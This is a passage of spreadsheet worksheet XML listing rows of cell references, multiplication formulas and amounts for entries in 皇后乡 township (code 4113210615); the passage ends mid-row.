      <c r="H1887" s="14">
        <v>300</v>
      </c>
      <c r="I1887" s="14">
        <f>H1887*G1887</f>
        <v>600</v>
      </c>
      <c r="J1887" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1887" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1888" ht="23" customHeight="1" spans="1:11">
      <c r="A1888" s="13" t="s">
        <v>5047</v>
      </c>
      <c r="B1888" s="14" t="str">
        <f>B1887</f>
        <v>皇后乡</v>
      </c>
      <c r="C1888" s="14" t="str">
        <f>C1887</f>
        <v>皇后乡</v>
      </c>
      <c r="D1888" s="13" t="s">
        <v>5048</v>
      </c>
      <c r="E1888" s="13" t="s">
        <v>5049</v>
      </c>
      <c r="F1888" s="14" t="str">
        <f>F1887</f>
        <v>4113210615</v>
      </c>
      <c r="G1888" s="14"/>
      <c r="H1888" s="14"/>
      <c r="I1888" s="14"/>
      <c r="J1888" s="14"/>
      <c r="K1888" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1889" ht="23" customHeight="1" spans="1:11">
      <c r="A1889" s="13" t="s">
        <v>5050</v>
      </c>
      <c r="B1889" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1889" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1889" s="14" t="s">
        <v>5051</v>
      </c>
      <c r="E1889" s="14" t="s">
        <v>5009</v>
      </c>
      <c r="F1889" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1889" s="14">
        <v>2</v>
      </c>
      <c r="H1889" s="14">
        <v>300</v>
      </c>
      <c r="I1889" s="14">
        <f>H1889*G1889</f>
        <v>600</v>
      </c>
      <c r="J1889" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1889" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1890" ht="23" customHeight="1" spans="1:11">
      <c r="A1890" s="13" t="s">
        <v>5052</v>
      </c>
      <c r="B1890" s="14" t="str">
        <f>B1889</f>
        <v>皇后乡</v>
      </c>
      <c r="C1890" s="14" t="str">
        <f>C1889</f>
        <v>皇后乡</v>
      </c>
      <c r="D1890" s="13" t="s">
        <v>5053</v>
      </c>
      <c r="E1890" s="13" t="s">
        <v>5022</v>
      </c>
      <c r="F1890" s="14" t="str">
        <f>F1889</f>
        <v>4113210615</v>
      </c>
      <c r="G1890" s="14"/>
      <c r="H1890" s="14"/>
      <c r="I1890" s="14"/>
      <c r="J1890" s="14"/>
      <c r="K1890" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1891" ht="23" customHeight="1" spans="1:11">
      <c r="A1891" s="13" t="s">
        <v>5054</v>
      </c>
      <c r="B1891" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1891" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1891" s="14" t="s">
        <v>5055</v>
      </c>
      <c r="E1891" s="14" t="s">
        <v>5056</v>
      </c>
      <c r="F1891" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1891" s="14">
        <v>1</v>
      </c>
      <c r="H1891" s="14">
        <v>340</v>
      </c>
      <c r="I1891" s="14">
        <f>H1891*G1891</f>
        <v>340</v>
      </c>
      <c r="J1891" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1891" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1892" ht="23" customHeight="1" spans="1:11">
      <c r="A1892" s="13" t="s">
        <v>5057</v>
      </c>
      <c r="B1892" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1892" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1892" s="14" t="s">
        <v>5058</v>
      </c>
      <c r="E1892" s="14" t="s">
        <v>5037</v>
      </c>
      <c r="F1892" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1892" s="14">
        <v>2</v>
      </c>
      <c r="H1892" s="14">
        <v>300</v>
      </c>
      <c r="I1892" s="14">
        <f>H1892*G1892</f>
        <v>600</v>
      </c>
      <c r="J1892" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1892" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1893" ht="23" customHeight="1" spans="1:11">
      <c r="A1893" s="13" t="s">
        <v>5059</v>
      </c>
      <c r="B1893" s="14" t="str">
        <f>B1892</f>
        <v>皇后乡</v>
      </c>
      <c r="C1893" s="14" t="str">
        <f>C1892</f>
        <v>皇后乡</v>
      </c>
      <c r="D1893" s="13" t="s">
        <v>5060</v>
      </c>
      <c r="E1893" s="20" t="s">
        <v>5061</v>
      </c>
      <c r="F1893" s="14" t="str">
        <f>F1892</f>
        <v>4113210615</v>
      </c>
      <c r="G1893" s="14"/>
      <c r="H1893" s="14"/>
      <c r="I1893" s="14"/>
      <c r="J1893" s="14"/>
      <c r="K1893" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1894" ht="23" customHeight="1" spans="1:11">
      <c r="A1894" s="13" t="s">
        <v>5062</v>
      </c>
      <c r="B1894" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1894" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1894" s="14" t="s">
        <v>5063</v>
      </c>
      <c r="E1894" s="14" t="s">
        <v>5064</v>
      </c>
      <c r="F1894" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1894" s="14">
        <v>2</v>
      </c>
      <c r="H1894" s="14">
        <v>300</v>
      </c>
      <c r="I1894" s="14">
        <f>H1894*G1894</f>
        <v>600</v>
      </c>
      <c r="J1894" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1894" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1895" ht="23" customHeight="1" spans="1:11">
      <c r="A1895" s="13" t="s">
        <v>5065</v>
      </c>
      <c r="B1895" s="14" t="str">
        <f>B1894</f>
        <v>皇后乡</v>
      </c>
      <c r="C1895" s="14" t="str">
        <f>C1894</f>
        <v>皇后乡</v>
      </c>
      <c r="D1895" s="13" t="s">
        <v>5066</v>
      </c>
      <c r="E1895" s="13" t="s">
        <v>5022</v>
      </c>
      <c r="F1895" s="14" t="str">
        <f>F1894</f>
        <v>4113210615</v>
      </c>
      <c r="G1895" s="14"/>
      <c r="H1895" s="14"/>
      <c r="I1895" s="14"/>
      <c r="J1895" s="14"/>
      <c r="K1895" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1896" ht="23" customHeight="1" spans="1:11">
      <c r="A1896" s="13" t="s">
        <v>5067</v>
      </c>
      <c r="B1896" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1896" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1896" s="14" t="s">
        <v>5068</v>
      </c>
      <c r="E1896" s="14" t="s">
        <v>4962</v>
      </c>
      <c r="F1896" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1896" s="14">
        <v>1</v>
      </c>
      <c r="H1896" s="14">
        <v>340</v>
      </c>
      <c r="I1896" s="14">
        <f>H1896*G1896</f>
        <v>340</v>
      </c>
      <c r="J1896" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1896" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1897" ht="23" customHeight="1" spans="1:11">
      <c r="A1897" s="13" t="s">
        <v>5069</v>
      </c>
      <c r="B1897" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1897" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1897" s="14" t="s">
        <v>5070</v>
      </c>
      <c r="E1897" s="14" t="s">
        <v>5071</v>
      </c>
      <c r="F1897" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1897" s="14">
        <v>1</v>
      </c>
      <c r="H1897" s="14">
        <v>340</v>
      </c>
      <c r="I1897" s="14">
        <f>H1897*G1897</f>
        <v>340</v>
      </c>
      <c r="J1897" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1897" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1898" ht="23" customHeight="1" spans="1:11">
      <c r="A1898" s="13" t="s">
        <v>5072</v>
      </c>
      <c r="B1898" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1898" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1898" s="14" t="s">
        <v>5073</v>
      </c>
      <c r="E1898" s="14" t="s">
        <v>4976</v>
      </c>
      <c r="F1898" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1898" s="14">
        <v>1</v>
      </c>
      <c r="H1898" s="14">
        <v>340</v>
      </c>
      <c r="I1898" s="14">
        <f>H1898*G1898</f>
        <v>340</v>
      </c>
      <c r="J1898" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1898" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1899" ht="23" customHeight="1" spans="1:11">
      <c r="A1899" s="13" t="s">
        <v>5074</v>
      </c>
      <c r="B1899" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1899" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1899" s="14" t="s">
        <v>5075</v>
      </c>
      <c r="E1899" s="14" t="s">
        <v>5076</v>
      </c>
      <c r="F1899" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1899" s="14">
        <v>2</v>
      </c>
      <c r="H1899" s="14">
        <v>300</v>
      </c>
      <c r="I1899" s="14">
        <f>H1899*G1899</f>
        <v>600</v>
      </c>
      <c r="J1899" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1899" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1900" ht="23" customHeight="1" spans="1:11">
      <c r="A1900" s="13" t="s">
        <v>5077</v>
      </c>
      <c r="B1900" s="14" t="str">
        <f>B1899</f>
        <v>皇后乡</v>
      </c>
      <c r="C1900" s="14" t="str">
        <f>C1899</f>
        <v>皇后乡</v>
      </c>
      <c r="D1900" s="13" t="s">
        <v>5078</v>
      </c>
      <c r="E1900" s="13" t="s">
        <v>4897</v>
      </c>
      <c r="F1900" s="14" t="str">
        <f>F1899</f>
        <v>4113210615</v>
      </c>
      <c r="G1900" s="14"/>
      <c r="H1900" s="14"/>
      <c r="I1900" s="14"/>
      <c r="J1900" s="14"/>
      <c r="K1900" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1901" ht="23" customHeight="1" spans="1:11">
      <c r="A1901" s="13" t="s">
        <v>5079</v>
      </c>
      <c r="B1901" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1901" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1901" s="14" t="s">
        <v>5080</v>
      </c>
      <c r="E1901" s="14" t="s">
        <v>4945</v>
      </c>
      <c r="F1901" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1901" s="14">
        <v>1</v>
      </c>
      <c r="H1901" s="14">
        <v>340</v>
      </c>
      <c r="I1901" s="14">
        <f>H1901*G1901</f>
        <v>340</v>
      </c>
      <c r="J1901" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1901" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1902" ht="23" customHeight="1" spans="1:11">
      <c r="A1902" s="13" t="s">
        <v>5081</v>
      </c>
      <c r="B1902" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1902" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1902" s="14" t="s">
        <v>5082</v>
      </c>
      <c r="E1902" s="14" t="s">
        <v>4959</v>
      </c>
      <c r="F1902" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1902" s="14">
        <v>2</v>
      </c>
      <c r="H1902" s="14">
        <v>300</v>
      </c>
      <c r="I1902" s="14">
        <f>H1902*G1902</f>
        <v>600</v>
      </c>
      <c r="J1902" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1902" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1903" ht="23" customHeight="1" spans="1:11">
      <c r="A1903" s="13" t="s">
        <v>5083</v>
      </c>
      <c r="B1903" s="14" t="str">
        <f>B1902</f>
        <v>皇后乡</v>
      </c>
      <c r="C1903" s="14" t="str">
        <f>C1902</f>
        <v>皇后乡</v>
      </c>
      <c r="D1903" s="13" t="s">
        <v>5084</v>
      </c>
      <c r="E1903" s="13" t="s">
        <v>5031</v>
      </c>
      <c r="F1903" s="14" t="str">
        <f>F1902</f>
        <v>4113210615</v>
      </c>
      <c r="G1903" s="14"/>
      <c r="H1903" s="14"/>
      <c r="I1903" s="14"/>
      <c r="J1903" s="14"/>
      <c r="K1903" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1904" ht="23" customHeight="1" spans="1:11">
      <c r="A1904" s="13" t="s">
        <v>5085</v>
      </c>
      <c r="B1904" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1904" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1904" s="14" t="s">
        <v>5086</v>
      </c>
      <c r="E1904" s="14" t="s">
        <v>5087</v>
      </c>
      <c r="F1904" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1904" s="14">
        <v>1</v>
      </c>
      <c r="H1904" s="14">
        <v>340</v>
      </c>
      <c r="I1904" s="14">
        <f>H1904*G1904</f>
        <v>340</v>
      </c>
      <c r="J1904" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1904" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1905" ht="23" customHeight="1" spans="1:11">
      <c r="A1905" s="13" t="s">
        <v>5088</v>
      </c>
      <c r="B1905" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1905" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1905" s="14" t="s">
        <v>5089</v>
      </c>
      <c r="E1905" s="14" t="s">
        <v>4922</v>
      </c>
      <c r="F1905" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1905" s="14">
        <v>1</v>
      </c>
      <c r="H1905" s="14">
        <v>340</v>
      </c>
      <c r="I1905" s="14">
        <f>H1905*G1905</f>
        <v>340</v>
      </c>
      <c r="J1905" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1905" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1906" ht="23" customHeight="1" spans="1:11">
      <c r="A1906" s="13" t="s">
        <v>5090</v>
      </c>
      <c r="B1906" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1906" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1906" s="14" t="s">
        <v>5091</v>
      </c>
      <c r="E1906" s="14" t="s">
        <v>4893</v>
      </c>
      <c r="F1906" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1906" s="14">
        <v>2</v>
      </c>
      <c r="H1906" s="14">
        <v>300</v>
      </c>
      <c r="I1906" s="14">
        <f>H1906*G1906</f>
        <v>600</v>
      </c>
      <c r="J1906" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1906" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1907" ht="23" customHeight="1" spans="1:11">
      <c r="A1907" s="13" t="s">
        <v>5092</v>
      </c>
      <c r="B1907" s="14" t="str">
        <f>B1906</f>
        <v>皇后乡</v>
      </c>
      <c r="C1907" s="14" t="str">
        <f>C1906</f>
        <v>皇后乡</v>
      </c>
      <c r="D1907" s="13" t="s">
        <v>5093</v>
      </c>
      <c r="E1907" s="13" t="s">
        <v>4962</v>
      </c>
      <c r="F1907" s="14" t="str">
        <f>F1906</f>
        <v>4113210615</v>
      </c>
      <c r="G1907" s="14"/>
      <c r="H1907" s="14"/>
      <c r="I1907" s="14"/>
      <c r="J1907" s="14"/>
      <c r="K1907" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1908" ht="23" customHeight="1" spans="1:11">
      <c r="A1908" s="13" t="s">
        <v>5094</v>
      </c>
      <c r="B1908" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1908" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1908" s="14" t="s">
        <v>5095</v>
      </c>
      <c r="E1908" s="14" t="s">
        <v>5076</v>
      </c>
      <c r="F1908" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1908" s="14">
        <v>2</v>
      </c>
      <c r="H1908" s="14">
        <v>300</v>
      </c>
      <c r="I1908" s="14">
        <f>H1908*G1908</f>
        <v>600</v>
      </c>
      <c r="J1908" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1908" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1909" ht="23" customHeight="1" spans="1:11">
      <c r="A1909" s="13" t="s">
        <v>5096</v>
      </c>
      <c r="B1909" s="14" t="str">
        <f>B1908</f>
        <v>皇后乡</v>
      </c>
      <c r="C1909" s="14" t="str">
        <f>C1908</f>
        <v>皇后乡</v>
      </c>
      <c r="D1909" s="13" t="s">
        <v>5097</v>
      </c>
      <c r="E1909" s="13" t="s">
        <v>5098</v>
      </c>
      <c r="F1909" s="14" t="str">
        <f>F1908</f>
        <v>4113210615</v>
      </c>
      <c r="G1909" s="14"/>
      <c r="H1909" s="14"/>
      <c r="I1909" s="14"/>
      <c r="J1909" s="14"/>
      <c r="K1909" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1910" ht="23" customHeight="1" spans="1:11">
      <c r="A1910" s="13" t="s">
        <v>5099</v>
      </c>
      <c r="B1910" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1910" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1910" s="14" t="s">
        <v>5100</v>
      </c>
      <c r="E1910" s="14" t="s">
        <v>5101</v>
      </c>
      <c r="F1910" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1910" s="14">
        <v>2</v>
      </c>
      <c r="H1910" s="14">
        <v>300</v>
      </c>
      <c r="I1910" s="14">
        <f>H1910*G1910</f>
        <v>600</v>
      </c>
      <c r="J1910" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1910" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1911" ht="23" customHeight="1" spans="1:11">
      <c r="A1911" s="13" t="s">
        <v>5102</v>
      </c>
      <c r="B1911" s="14" t="str">
        <f>B1910</f>
        <v>皇后乡</v>
      </c>
      <c r="C1911" s="14" t="str">
        <f>C1910</f>
        <v>皇后乡</v>
      </c>
      <c r="D1911" s="13" t="s">
        <v>5103</v>
      </c>
      <c r="E1911" s="13" t="s">
        <v>4976</v>
      </c>
      <c r="F1911" s="14" t="str">
        <f>F1910</f>
        <v>4113210615</v>
      </c>
      <c r="G1911" s="14"/>
      <c r="H1911" s="14"/>
      <c r="I1911" s="14"/>
      <c r="J1911" s="14"/>
      <c r="K1911" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1912" ht="23" customHeight="1" spans="1:11">
      <c r="A1912" s="13" t="s">
        <v>5104</v>
      </c>
      <c r="B1912" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1912" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1912" s="14" t="s">
        <v>5105</v>
      </c>
      <c r="E1912" s="14" t="s">
        <v>5009</v>
      </c>
      <c r="F1912" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1912" s="14">
        <v>2</v>
      </c>
      <c r="H1912" s="14">
        <v>300</v>
      </c>
      <c r="I1912" s="14">
        <f>H1912*G1912</f>
        <v>600</v>
      </c>
      <c r="J1912" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1912" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1913" ht="23" customHeight="1" spans="1:11">
      <c r="A1913" s="13" t="s">
        <v>5106</v>
      </c>
      <c r="B1913" s="14" t="str">
        <f>B1912</f>
        <v>皇后乡</v>
      </c>
      <c r="C1913" s="14" t="str">
        <f>C1912</f>
        <v>皇后乡</v>
      </c>
      <c r="D1913" s="13" t="s">
        <v>5107</v>
      </c>
      <c r="E1913" s="13" t="s">
        <v>5071</v>
      </c>
      <c r="F1913" s="14" t="str">
        <f>F1912</f>
        <v>4113210615</v>
      </c>
      <c r="G1913" s="14"/>
      <c r="H1913" s="14"/>
      <c r="I1913" s="14"/>
      <c r="J1913" s="14"/>
      <c r="K1913" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1914" ht="23" customHeight="1" spans="1:11">
      <c r="A1914" s="13" t="s">
        <v>5108</v>
      </c>
      <c r="B1914" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1914" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1914" s="14" t="s">
        <v>5109</v>
      </c>
      <c r="E1914" s="14" t="s">
        <v>4972</v>
      </c>
      <c r="F1914" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1914" s="14">
        <v>1</v>
      </c>
      <c r="H1914" s="14">
        <v>340</v>
      </c>
      <c r="I1914" s="14">
        <f>H1914*G1914</f>
        <v>340</v>
      </c>
      <c r="J1914" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1914" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1915" ht="23" customHeight="1" spans="1:11">
      <c r="A1915" s="13" t="s">
        <v>5110</v>
      </c>
      <c r="B1915" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1915" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1915" s="14" t="s">
        <v>5111</v>
      </c>
      <c r="E1915" s="14" t="s">
        <v>5076</v>
      </c>
      <c r="F1915" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1915" s="14">
        <v>2</v>
      </c>
      <c r="H1915" s="14">
        <v>300</v>
      </c>
      <c r="I1915" s="14">
        <f>H1915*G1915</f>
        <v>600</v>
      </c>
      <c r="J1915" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1915" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1916" ht="23" customHeight="1" spans="1:11">
      <c r="A1916" s="13" t="s">
        <v>5112</v>
      </c>
      <c r="B1916" s="14" t="str">
        <f>B1915</f>
        <v>皇后乡</v>
      </c>
      <c r="C1916" s="14" t="str">
        <f>C1915</f>
        <v>皇后乡</v>
      </c>
      <c r="D1916" s="13" t="s">
        <v>5113</v>
      </c>
      <c r="E1916" s="13" t="s">
        <v>5022</v>
      </c>
      <c r="F1916" s="14" t="str">
        <f>F1915</f>
        <v>4113210615</v>
      </c>
      <c r="G1916" s="14"/>
      <c r="H1916" s="14"/>
      <c r="I1916" s="14"/>
      <c r="J1916" s="14"/>
      <c r="K1916" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1917" ht="23" customHeight="1" spans="1:11">
      <c r="A1917" s="13" t="s">
        <v>5114</v>
      </c>
      <c r="B1917" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1917" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1917" s="14" t="s">
        <v>5115</v>
      </c>
      <c r="E1917" s="14" t="s">
        <v>5116</v>
      </c>
      <c r="F1917" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1917" s="14">
        <v>1</v>
      </c>
      <c r="H1917" s="14">
        <v>340</v>
      </c>
      <c r="I1917" s="14">
        <f>H1917*G1917</f>
        <v>340</v>
      </c>
      <c r="J1917" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1917" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1918" ht="23" customHeight="1" spans="1:11">
      <c r="A1918" s="13" t="s">
        <v>5117</v>
      </c>
      <c r="B1918" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1918" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1918" s="14" t="s">
        <v>5118</v>
      </c>
      <c r="E1918" s="14" t="s">
        <v>5119</v>
      </c>
      <c r="F1918" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1918" s="14">
        <v>2</v>
      </c>
      <c r="H1918" s="14">
        <v>300</v>
      </c>
      <c r="I1918" s="14">
        <f>H1918*G1918</f>
        <v>600</v>
      </c>
      <c r="J1918" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1918" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1919" ht="23" customHeight="1" spans="1:11">
      <c r="A1919" s="13" t="s">
        <v>5120</v>
      </c>
      <c r="B1919" s="14" t="str">
        <f>B1918</f>
        <v>皇后乡</v>
      </c>
      <c r="C1919" s="14" t="str">
        <f>C1918</f>
        <v>皇后乡</v>
      </c>
      <c r="D1919" s="13" t="s">
        <v>5121</v>
      </c>
      <c r="E1919" s="13" t="s">
        <v>4962</v>
      </c>
      <c r="F1919" s="14" t="str">
        <f>F1918</f>
        <v>4113210615</v>
      </c>
      <c r="G1919" s="14"/>
      <c r="H1919" s="14"/>
      <c r="I1919" s="14"/>
      <c r="J1919" s="14"/>
      <c r="K1919" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1920" ht="23" customHeight="1" spans="1:11">
      <c r="A1920" s="13" t="s">
        <v>5122</v>
      </c>
      <c r="B1920" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1920" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1920" s="14" t="s">
        <v>5123</v>
      </c>
      <c r="E1920" s="14" t="s">
        <v>4900</v>
      </c>
      <c r="F1920" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1920" s="14">
        <v>2</v>
      </c>
      <c r="H1920" s="14">
        <v>300</v>
      </c>
      <c r="I1920" s="14">
        <f>H1920*G1920</f>
        <v>600</v>
      </c>
      <c r="J1920" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1920" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1921" ht="23" customHeight="1" spans="1:11">
      <c r="A1921" s="13" t="s">
        <v>5124</v>
      </c>
      <c r="B1921" s="14" t="str">
        <f>B1920</f>
        <v>皇后乡</v>
      </c>
      <c r="C1921" s="14" t="str">
        <f>C1920</f>
        <v>皇后乡</v>
      </c>
      <c r="D1921" s="13" t="s">
        <v>5125</v>
      </c>
      <c r="E1921" s="13" t="s">
        <v>4981</v>
      </c>
      <c r="F1921" s="14" t="str">
        <f>F1920</f>
        <v>4113210615</v>
      </c>
      <c r="G1921" s="14"/>
      <c r="H1921" s="14"/>
      <c r="I1921" s="14"/>
      <c r="J1921" s="14"/>
      <c r="K1921" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1922" ht="23" customHeight="1" spans="1:11">
      <c r="A1922" s="13" t="s">
        <v>5126</v>
      </c>
      <c r="B1922" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1922" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1922" s="14" t="s">
        <v>5127</v>
      </c>
      <c r="E1922" s="14" t="s">
        <v>5037</v>
      </c>
      <c r="F1922" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1922" s="14">
        <v>2</v>
      </c>
      <c r="H1922" s="14">
        <v>300</v>
      </c>
      <c r="I1922" s="14">
        <f>H1922*G1922</f>
        <v>600</v>
      </c>
      <c r="J1922" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1922" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1923" ht="23" customHeight="1" spans="1:11">
      <c r="A1923" s="13" t="s">
        <v>5128</v>
      </c>
      <c r="B1923" s="14" t="str">
        <f>B1922</f>
        <v>皇后乡</v>
      </c>
      <c r="C1923" s="14" t="str">
        <f>C1922</f>
        <v>皇后乡</v>
      </c>
      <c r="D1923" s="13" t="s">
        <v>5129</v>
      </c>
      <c r="E1923" s="13" t="s">
        <v>5061</v>
      </c>
      <c r="F1923" s="14" t="str">
        <f>F1922</f>
        <v>4113210615</v>
      </c>
      <c r="G1923" s="14"/>
      <c r="H1923" s="14"/>
      <c r="I1923" s="14"/>
      <c r="J1923" s="14"/>
      <c r="K1923" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1924" ht="23" customHeight="1" spans="1:11">
      <c r="A1924" s="13" t="s">
        <v>5130</v>
      </c>
      <c r="B1924" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1924" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1924" s="14" t="s">
        <v>5131</v>
      </c>
      <c r="E1924" s="14" t="s">
        <v>4908</v>
      </c>
      <c r="F1924" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1924" s="14">
        <v>2</v>
      </c>
      <c r="H1924" s="14">
        <v>300</v>
      </c>
      <c r="I1924" s="14">
        <f>H1924*G1924</f>
        <v>600</v>
      </c>
      <c r="J1924" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1924" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1925" ht="23" customHeight="1" spans="1:11">
      <c r="A1925" s="13" t="s">
        <v>5132</v>
      </c>
      <c r="B1925" s="14" t="str">
        <f>B1924</f>
        <v>皇后乡</v>
      </c>
      <c r="C1925" s="14" t="str">
        <f>C1924</f>
        <v>皇后乡</v>
      </c>
      <c r="D1925" s="13" t="s">
        <v>1159</v>
      </c>
      <c r="E1925" s="13" t="s">
        <v>5133</v>
      </c>
      <c r="F1925" s="14" t="str">
        <f>F1924</f>
        <v>4113210615</v>
      </c>
      <c r="G1925" s="14"/>
      <c r="H1925" s="14"/>
      <c r="I1925" s="14"/>
      <c r="J1925" s="14"/>
      <c r="K1925" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1926" ht="23" customHeight="1" spans="1:11">
      <c r="A1926" s="13" t="s">
        <v>5134</v>
      </c>
      <c r="B1926" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1926" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1926" s="14" t="s">
        <v>5135</v>
      </c>
      <c r="E1926" s="14" t="s">
        <v>5012</v>
      </c>
      <c r="F1926" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1926" s="14">
        <v>2</v>
      </c>
      <c r="H1926" s="14">
        <v>300</v>
